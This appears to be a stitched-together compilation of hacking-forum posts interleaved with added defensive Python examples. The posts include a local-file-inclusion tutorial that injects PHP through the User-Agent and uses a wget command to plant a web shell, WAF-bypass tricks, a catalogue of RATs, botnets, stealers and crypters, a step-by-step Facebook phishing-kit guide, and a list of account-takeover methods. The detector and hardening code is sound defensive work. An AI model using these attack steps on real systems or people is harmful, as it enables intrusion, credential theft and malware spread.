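    "benign":         "id=182",
}


def compare(samples=SAMPLES):
    """Map each sample to (naive verdict, normalized verdict)."""
    return {name: (naive_flags(q), normalized_flags(q)) for name, q in samples.items()}


if __name__ == "__main__":
    for name, (naive, normalized) in compare().items():
        print(f"{name:15} naive={naive!s:5} normalized={normalized}")
```

Normalizing before matching closes the specific evasions shown above (the page's own payloads pass the naive rules and fail the normalized ones), but a keyword filter stays a secondary control: the parameter binding that removes the injection altogether belongs in the application.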

Local File Inclusion and WAF BYPASSING

Local File Inclusion

Requirements

First of all, check if the site has a vulnerability against
Quote:etc/passwd
To do that, take
Quote:http://www.site.com/index.php?filename=2
and change the number '2' to
Quote:etc/passwd
so that it looks like this:
Quote:http://www.site.com/index.php?filename=etc/passwd
If it works, it will show some type of output.

It will look like this

Do the same but change 'etc/passwd' to
Quote:/proc/self/environ

If it works and the file exists, you'll get something similar, but not the same output.

Let's open Tamper Data. To do that, press F10 and do as I did here.
[Image: 3cc30c8dcfa268c457726ec0ec417f93.png]

Now when you have Tamper Data up, it will look similar to this.

Click the button 'Start Tamper' in the top left corner.
[Image: 853ba2956894a57438d3b8c1dffe0698.png]

When the Tamper is done, you would see a window like this.
[Image: 76fce75d5c9b019cab1f21f7f7993bba.png]

Change your 'User-Agent' to
Quote:<?php phpinfo();?>
Now refresh your site.

And this is how it would look like.

Now let us upload our shell.

Start up Tamper Data, then click Start Tamper and go to the 'User-Agent' field again.

Type this into the 'User agent field'
Quote:<?exec('wget http://www.site.com/shell.txt -O shell.php');?>

The site will now download your shell. You can locate the shell at website/shell.php
or
http://www.site.com/index.php?filename=shell.php

And there you will find your uploaded shell.


WAF aka Web Application Firewalls.

Today, I'll show you how to bypass a web application firewall.

First of all, check if the site has an LFI vulnerability.
In order to do that, change your old vector /etc/passwd to %2fetc%2fpasswd.
Your whole URL, aka 'Uniform Resource Locator', would look like this.
Quote:BeggfomercyIsanoob.com/index.php?filename=%2fetc%2fpasswd.

So basically every '/' is changed to '%2f' (without quotes).
(/ = %2f) That's a pretty easy form to remember; keep that in mind.

This method is called 'URL encoding'. It can be thought of as a kind of algorithm.
As the name says, it encodes the URL and bypasses the filters if luck is with you.

To bypass the character limit, you can just do it like this.
Quote:/../etc/passwd/./././././././././././././././././././././././././././././
Or much more; it depends on the web server.

Null bytes: this method is pretty easy and can be really useful.
Add this to the end of your URL.
Quote:

For example.
Quote:  .com/index.php?filename=/etc/passwd.
You can even add null bytes instead. This will help you get around the firewalls, but it doesn't always work.

These are just a few methods; many more exist. I might cover those in another tutorial.

This does not cover everything; it's just the basics of WAF bypassing. There might be an error in the tutorial;
if so, please report it to me.
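Every payload in this post, /etc/passwd, /proc/self/environ, %2fetc%2fpasswd, the /../ padding and the null byte, targets an include that builds a path from the filename parameter unchecked. This added Python example (not from the original post; the content directory /srv/example-site is a constructed placeholder that need not exist) shows that pattern beside a resolver that decodes once, rejects null bytes and double encoding, confines the result to the content directory and allows only known extensions, and then runs the post's inputs through both.

```python
import os
from urllib.parse import unquote

ALLOWED_EXT = {".html", ".txt"}   # assumption: the include is meant to serve page fragments


def resolve_include_vulnerable(base_dir: str, filename: str) -> str:
    """The pattern the post exploits: the parameter is glued onto a path unchecked.
    os.path.join discards base_dir when filename is absolute, ../ is honoured,
    and a null byte would truncate the name in a C-based runtime."""
    return os.path.join(base_dir, filename)


def resolve_include_safe(base_dir: str, filename: str):
    """Decode once, reject nulls and double encoding, confine to base_dir, allow only
    known extensions. Returns the real path to serve, or None to refuse."""
    decoded = unquote(filename)                  # %2f -> / happens *before* any check
    if "\x00" in decoded or unquote(decoded) != decoded:
        return None                              # null byte, or still-encoded (%252f) input
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, decoded))
    if os.path.commonpath([base, candidate]) != base:
        return None                              # escaped the content directory
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXT:
        return None                              # /etc/passwd, /proc/self/environ, ...
    return candidate


# Inputs taken from the post plus one legitimate name, run against a constructed
# content directory; the path logic does not require the directory to exist.
BASE_DIR = "/srv/example-site"
PROBES = [
    "page2.html",
    "etc/passwd",
    "/etc/passwd",
    "%2fetc%2fpasswd",
    "/../etc/passwd/./././././",
    "/proc/self/environ",
    "page2.html%00.jpg",
    "%252fetc%252fpasswd",
]


def run_probes(base_dir=BASE_DIR, probes=PROBES):
    """Map each probe to what the hardened resolver would serve (None = refused)."""
    return {p: resolve_include_safe(base_dir, p) for p in probes}


if __name__ == "__main__":
    for probe, result in run_probes().items():
        print(f"{probe:30} unchecked -> {resolve_include_vulnerable(BASE_DIR, probe)}")
        print(f"{'':30} hardened  -> {result}")
```

The /proc/self/environ step works only because the include executes whatever it reads, so the strongest form of this fix is to stop taking a path at all and map a short fragment name to a file through an allow-list; the resolver above is the fallback when the parameter really must be a filename.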

Rats,Botnets,Stealers All Programs for Hacking


I will not post any cracked version of any rat

I will update this post when new versions come

All files posted here are CLEAN, analyzed by me. If you think any file is infected, just don't download it, and don't post shit. ALL files are detected by AVs; malware is always detected by AVs.

Tools marked with [C] you can find free using Google.

If you report any infected file, POST ANY PROOF or you get -rep

If you want your FREE or PAID rat/botnet/crypter/stealer/keylogger/bitcoin miner/ or any malware related posted here, just pm me with your thread link.


Remote Administration Tools - ( RATs )
- Cybergate 1.07.5
- DarkComet 5.3.1.F
- Xtreme Rat 2.9
- Pytho Rat 1.5
- nj Rat 0.4.1
- Grimm Rat 1.3 Beta
- Spy-Net 2.6
- Bifrost 1.2.1 d
- CyberEye 1.2
- Poison Ivy 2.3.2
- Schwarze Sonne Rat 2.0 Beta 2
- Turkojan 4.0
- Frutas 0.8 ( Java )
- RoyalNET RAT v1.3
- Bozok 1.1
- Adsocks 1.0 Beta ( Java )
- Greame Rat 1.5 Final
- NovaLite 3.0
- jRat 3 ( Java )
- Lost Door v8.0 Pure
- Daleth RAT 1.0
- Coolvibes RAT - [Pass: Coolvibes]
- DNA Rat
- Cerberus 1.03.5 beta
- R.A.I.D.
- bRAT - Batch RAT

Remote Administration Tools - ( RATs ) - Paid
- Blackshades - BACKDOORED. [C]
- Cybergate Rat [C]
- ClientMesh RAT
- Emissary Rat
- NetWire RAT
- BlackNix RAT
- legacyLink

HTTP Botnets
- Umbra Loader 1.1.1
- Umbra Loader 1.2.0 (Version by Hermalit)
- VertexNet 1.2.1
- µBOT
- Elite Loader
- Exodus Loader

HTTP Botnets - Paid
- Andromeda [C]
- Smoke Loader [C]
- Betabot

IRC Botnets
- AryaN Builder

IRC Botnets - Paid
- Athena IRC

Password Stealers
- ISR Stealer 0.4.1
- Crime24.NET
- aStealer
- iStealer 6.3 Legends ( Outdated )

Keyloggers
- Project Neptune 2.0
- Lion Keylogger V1
- HB 1.2.1 Beta

Crypters - Paid
- RazorCrypt2 - [AutoIT] [Start at $20]
- Debug Crypter v3 - [.NET] [Start at $25]
- Byte Crypter V8 - [.NET] [Start at $36]
- Infinity Crypter v4 - [.NET] [Start at $20]
- FLUX CRYPTER - [.NET] [Start at $15]
- X-Core Crypter - [AutoIt] [Start at $20]
- Soft Crypter - [.NET] [Start at $50]

Hack Facebook using Phishing Technique

MAKING FACEBOOK PHISHING SITE TUTORIAL.

Phishing is the act of attempting to acquire information such as usernames and passwords. Phishing directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of the social engineering techniques used to deceive users, and it exploits the poor usability of current web security technologies.


Tutorial:
Hi friends, I'm back with an easy and complete phishing tutorial. Phishing tricks have been posted here many times, but most users say they can't understand them, so now you can make your phishing page easily, step by step. This one has a great advantage: it's the latest FB phishing page, made by me. Reply here if you face any problem. Download this phishing script:
                                               Download


Then go to 000webhost.com
and choose the free account option.
Now click on free domain.

During registration, choose a password with a combination of capital letters, small letters and numbers.
After registration, verify your account by email.

Now you can see your control panel (refresh the page if required). Go to the control panel.

You can see a page for uploading your files (don't upload the file here; it must be uploaded to the public directory, as in the image below).

Upload your Facebook page in .zip format.

Now you can see your file below, like this.

That's all.
Now your phishing FB page is YourDomain.com/index.html.
index.html is your phishing page.

Now you can send this page to your victims. When a victim logs in on this fake page, their login and password are stored in your hosting directory in lol.txt, like below.





Note: this default FB phishing page redirects to www.google.com;
you can change that by editing hello.php in the downloaded fb phishing.zip pack.

This tutorial is for educational purposes only, to help protect you from hackers; applying this technique may be considered a crime.
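As an added example (not part of the original tutorial), here is the check that catches a page like the one described above. A phishing page copies the look of the real login page, but its form still has to deliver the credentials somewhere the attacker controls (here a hello.php on free hosting), so the thing to inspect is where the password form actually posts once the action is resolved against the page URL. The HTML samples, host names and the plain suffix rule in same_site() are constructed for this example; a production checker should use the Public Suffix List.

```python
"""Added example: flag login forms that post off-site or over plain http.
The HTML samples and host names below are constructed for this demo."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class FormCollector(HTMLParser):
    """Record the action of every <form> and whether it holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""), "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if a.get("type", "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def same_site(host, expected):
    """True only for expected itself or a subdomain of it, matched on whole
    labels, so facebook.com.evil.example and faceb00k.com both fail."""
    host = host.lower().rstrip(".")
    expected = expected.lower()
    return host == expected or host.endswith("." + expected)


def audit_login_forms(page_url, html, expected_domain):
    """Return (kind, target_url) for every password form that would post
    off-site or over plain http.  An empty list means nothing suspicious."""
    collector = FormCollector()
    collector.feed(html)
    findings = []
    for form in collector.forms:
        if not form["password"]:
            continue
        # an empty action resolves to the page URL itself
        target = urlparse(urljoin(page_url, form["action"]))
        if not same_site(target.hostname or "", expected_domain):
            findings.append(("OFF_SITE", target.geturl()))
        elif target.scheme != "https":
            findings.append(("PLAINTEXT", target.geturl()))
    return findings


# Constructed: the shape of the kit above, a look-alike page posting to hello.php.
PHISH_HTML = """<form method="post" action="hello.php">
  <input type="email" name="email">
  <input type="password" name="pass">
  <input type="submit" value="Log In">
</form>"""

# Constructed: a same-origin HTTPS login form, the case that should pass.
LEGIT_HTML = """<form method="post" action="/login/">
  <input type="text" name="email">
  <input type="password" name="pass">
</form>"""

if __name__ == "__main__":
    print(audit_login_forms("http://yourdomain.example/index.html", PHISH_HTML, "facebook.com"))
    print(audit_login_forms("https://www.facebook.com/login", LEGIT_HTML, "facebook.com"))
```

Note that the kit as described writes the captured logins to lol.txt next to hello.php in the public directory, so the same file the attacker reads back is fetchable by anyone who finds the page; a credential store that is itself world-readable is what to look for when you find one of these pages live.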


Top Ways to Hack Facebook Accounts



Top 8 Ways To Hack Facebook Accounts 

There are various methods to hack a Facebook account password, such as keyloggers and phishing websites, whereas brute forcing, dictionary attacks, DDoS attacks and the like will not work directly because of the account lockout feature. In this post I am going to share some very effective ways to hack a Facebook account; I have named it Top 8 ways to hack Facebook accounts.



8 Ways To Hack Facebook

1. Facebook Phishing 




Phishing is still the most popular attack vector used for hacking Facebook accounts. There are a variety of ways to carry out a phishing attack. In a simple phishing attack a hacker creates a fake login page that looks exactly like the real Facebook page and then gets the victim to log in to that page. Once the victim logs in through the fake page, the victim's email address and password are stored in a text file; the hacker then downloads the text file and has the victim's credentials.
I have explained the step by step phishing process in my post below:
                     

2. Keylogging 

Keylogging, in my opinion, is the easiest way to hack a Facebook password. Keylogging can be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which, once installed on the victim's computer, records everything the victim types on it. The logs are then sent back to the attacker, either by FTP or directly to the hacker's email address.

I have explained the step by step process in my post 

How To Hack Facebook With keylogging

3. Session Hijacking




Session hijacking can be very dangerous if you are accessing Facebook over an http:// connection. In a session hijacking attack a hacker steals the victim's browser cookie, which is what authenticates the user to the website, and uses it to access the victim's account. Session hijacking is widely used on LANs. I have already written a three-part series on how session hijacking works, and a separate post on Facebook session hijacking.


4. Sidejacking With Firesheep


Sidejacking attacks became common in late 2010, but they are still popular today. Firesheep is widely used to carry them out; Firesheep only works when the attacker and victim are on the same Wi-Fi network. A sidejacking attack is basically another name for HTTP session hijacking, but it is aimed at Wi-Fi users.
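As an added example (not part of the original post), here is a check for the two conditions that make items 3 and 4 work: the login response travelling over plain http, and the session cookie being set without the Secure flag, so the browser will also send it on any http:// request to the site and anyone on the same Wi-Fi can read it and replay it. The response headers and cookie names below are constructed for this example.

```python
"""Added example: audit a login response for the weaknesses that enable
cookie theft over the network.  The headers below are constructed."""


def parse_set_cookie(value):
    """Split one Set-Cookie value into (cookie name, set of lower-cased attribute names)."""
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {p.split("=", 1)[0].strip().lower() for p in parts[1:] if p}
    return name, attrs


def audit_login_response(scheme, headers):
    """headers: list of (name, value) pairs as received.  Returns one
    (finding, cookie) tuple per weakness, in the order encountered."""
    findings = []
    if scheme.lower() != "https":
        # the whole exchange, cookie included, is readable by a sniffer
        findings.append(("PLAINTEXT_RESPONSE", "*"))
    for hname, hvalue in headers:
        if hname.lower() != "set-cookie":
            continue
        cookie, attrs = parse_set_cookie(hvalue)
        if "secure" not in attrs:
            # the browser will replay this cookie over http:// too, which is
            # exactly what Firesheep-style sidejacking waits for
            findings.append(("MISSING_SECURE", cookie))
        if "httponly" not in attrs:
            # readable from page script, so an XSS can lift it as well
            findings.append(("MISSING_HTTPONLY", cookie))
    return findings


# Constructed sample: a weak login response (session cookie without flags).
WEAK_RESPONSE = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "sid=3f9c1a2b; Path=/"),
    ("Set-Cookie", "theme=dark; Path=/; Secure; HttpOnly"),
]

# Constructed sample: the same login done properly.
HARDENED_RESPONSE = [
    ("Set-Cookie", "sid=3f9c1a2b; Path=/; Secure; HttpOnly"),
]

if __name__ == "__main__":
    print(audit_login_response("http", WEAK_RESPONSE))
    print(audit_login_response("https", HARDENED_RESPONSE))
```

Run it against a saved response from any login you care about; a session cookie that shows up as MISSING_SECURE is the one a sidejacker on the same network can use.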
To know more about sidejacking attacks and Firesheep, read the post mentioned below:



5. Mobile Phone Hacking
Millions of Facebook users access Facebook through their mobile phones. If a hacker can gain access to the victim's mobile phone, he can probably gain access to his/her Facebook account. There are lots of mobile spying programs used to monitor a cellphone.
The most popular mobile phone spying software is:
1. Mobile Spy

6. DNS Spoofing 

If both the victim and attacker are on the same network, the attacker can use a DNS spoofing attack to point facebook.com at his own fake page and so capture the victim's Facebook login. Note that this only works cleanly over plain http: a spoofed facebook.com served over https will fail certificate validation unless the victim clicks through the browser warning.

7. USB Hacking 

USB password stealer
If an attacker has physical access to your computer, he can just insert a USB drive programmed to automatically extract the passwords saved in the browser. I have also posted about this attack, which you can read at the link below:

8. Man In the Middle Attacks

If the victim and attacker are on the same LAN on a switched network, a hacker can place himself between the client and the server, or pose as the default gateway, and so capture all the traffic in between. ARP poisoning is the usual way of getting into that position on a LAN (it is often used as a synonym for man in the middle attacks, though it is just one way of mounting one) and is a very broad topic beyond the scope of this article. We have written a couple of articles on man in the middle attacks, which can be accessed from the links mentioned below:
If you are really interested in learning how man in the middle attacks work, you can view the presentation
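As an added example (not part of the original post), here is how the ARP poisoning behind item 8 shows up to a passive sniffer on the LAN, and a small detector for it: the attacker's host answers ARP for the gateway's IP (and usually for the victim's too), so the gateway's MAC changes and one MAC ends up claiming more than one address. The reply log, IP addresses and MACs below are constructed for this example.

```python
"""Added example: detect ARP poisoning from a log of ARP replies.
The replies, addresses and MACs below are constructed for this demo."""
from collections import defaultdict

# Constructed: (time, sender IP, sender MAC) from ARP replies seen on the wire.
# The first three are normal; the last two are one host announcing itself as
# both the gateway and the victim, the two-sided poisoning used to sit between them.
ARP_REPLIES = [
    ("10:00:01", "192.168.1.1",  "aa:bb:cc:00:00:01"),
    ("10:00:02", "192.168.1.10", "aa:bb:cc:00:00:10"),
    ("10:00:05", "192.168.1.1",  "aa:bb:cc:00:00:01"),
    ("10:00:30", "192.168.1.1",  "aa:bb:cc:00:00:66"),
    ("10:00:31", "192.168.1.10", "aa:bb:cc:00:00:66"),
]


def detect_arp_poisoning(replies, gateway_ip):
    """Return alerts for (1) an IP whose MAC differs from the first one seen
    for it, flagged separately when the IP is the gateway, and (2) one MAC
    claiming the gateway plus another host.  Ordinary DHCP churn can trigger
    (1) for normal hosts; the gateway changing MAC is the strong signal."""
    first_mac = {}                  # ip -> MAC that first claimed it
    ips_by_mac = defaultdict(set)   # MAC -> every IP it has claimed
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        ips_by_mac[mac].add(ip)
        known = first_mac.setdefault(ip, mac)
        if mac != known:
            kind = "GATEWAY_MAC_CHANGED" if ip == gateway_ip else "MAC_CHANGED"
            alerts.append((ts, kind, ip, known, mac))
        if len(ips_by_mac[mac]) > 1 and gateway_ip in ips_by_mac[mac]:
            alerts.append((ts, "ONE_MAC_CLAIMS_GATEWAY_AND_HOST", mac,
                           tuple(sorted(ips_by_mac[mac]))))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(ARP_REPLIES, "192.168.1.1"):
        print(*alert)
```

The classic host-side mitigation is to pin the gateway with a static ARP entry (arp -s on Linux and Windows), which makes the host ignore the forged replies this detector is looking for.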
